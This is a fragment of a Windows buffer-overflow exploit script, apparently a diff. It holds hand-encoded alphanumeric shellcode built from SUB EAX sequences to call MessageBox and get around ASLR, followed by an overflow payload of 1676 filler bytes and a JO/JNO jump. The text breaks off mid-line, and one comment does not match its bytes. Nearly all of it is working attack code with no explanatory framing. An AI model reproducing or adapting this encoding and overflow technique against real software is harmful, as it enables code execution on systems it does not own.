ASLR for Windows API call to MessageBox function. +# \x31\xc0\x50\x68 +# \x42\x41\x4a\x41 +# \x89\xe1\x50\x68 +# \x42\x41\x4a\x41 +# \x89\xe2\x50\x50 +# \x51\x52\x50\xbe +# \x38\x20\x00\x10 +# \xff\xe6\x41\x41 + +# 534F1555 534F0255 53500157 (bit of byte mangling after jmp esi, but works nonetheless!) 
+shellcode = zero # zero out eax +shellcode += "\x2d\x55\x15\x4f\x53" # sub eax, 0x534f1555 +shellcode += "\x2d\x55\x02\x4f\x53" # sub eax, 0x534f0255 +shellcode += "\x2d\x57\x01\x50\x53" # sub eax, 0x53500157 +shellcode += "\x50" # push eax + +# 4F554A42 4F554A42 51554B44 +shellcode += zero # zero out eax +shellcode += "\x2d\x42\x4a\x55\x4f" # sub eax, 0x4f554a42 +shellcode += "\x2d\x42\x4a\x55\x4f" # sub eax, 0x4f554a42 +shellcode += "\x2d\x44\x4b\x55\x51" # sub eax, 0x51554b44 +shellcode += "\x50" # push eax + +# 153A393A 153A393A 173B3B3B +shellcode += zero +shellcode += "\x2d\x3a\x39\x3a\x15" # sub eax, 0x173b3b3b +shellcode += "\x2d\x3a\x39\x3a\x15" # sub eax, 0x153a393a +shellcode += "\x2d\x3b\x3b\x3b\x17" # sub eax, 0x173b3b3b +shellcode += "\x50" # push eax + +# 3A3A1927 3A3A0227 3B3B0229 +shellcode += zero # zero out eax +shellcode += "\x2d\x27\x19\x3a\x3a" # sub eax, 0x3a3a1927 +shellcode += "\x2d\x27\x02\x3a\x3a" # sub eax, 0x3a3a0227 +shellcode += "\x2d\x29\x02\x3b\x3b" # sub eax, 0x3b3b0229 +shellcode += "\x50" # push eax + +# 3F3C3F3F 3F3C3F3F 403D4040 +shellcode += zero # zero out eax +shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f +shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f +shellcode += "\x2d\x40\x40\x3d\x40" # sub eax, 0x403d4040 +shellcode += "\x50" # push eax + +# 323A1A27 323A0227 333B0229 +shellcode += zero # zero out eax +shellcode += "\x2d\x27\x1a\x3a\x32" # sub eax, 0x323a1a27 +shellcode += "\x2d\x27\x02\x3a\x32" # sub eax, 0x323a0227 +shellcode += "\x2d\x29\x02\x3b\x33" # sub eax, 0x333b0229 +shellcode += "\x50" # push eax + +# 3F3C3F3F 3F3C3F3F 403D4040 +shellcode += zero # zero out eax +shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f +shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f +shellcode += "\x2d\x40\x40\x3d\x40" # sub eax, 0x403d4040 +shellcode += "\x50" # push eax + +# 323A1545 323A1545 333B1545 +shellcode += zero # zero out eax +shellcode += "\x2d\x45\x15\x3a\x32" # sub eax, 
0x323a1545 +shellcode += "\x2d\x45\x15\x3A\x32" # sub eax, 0x323a1545 +shellcode += "\x2d\x45\x15\x3b\x33" # sub eax, 0x333b1545 +shellcode += "\x50" # push eax + +# Let's roll. +payload = "\x41" * 1676 +payload += "\x70\x06\x71\x06" # JO 6 bytes. If fails, JNO 6 bytes +payload += struct.pack('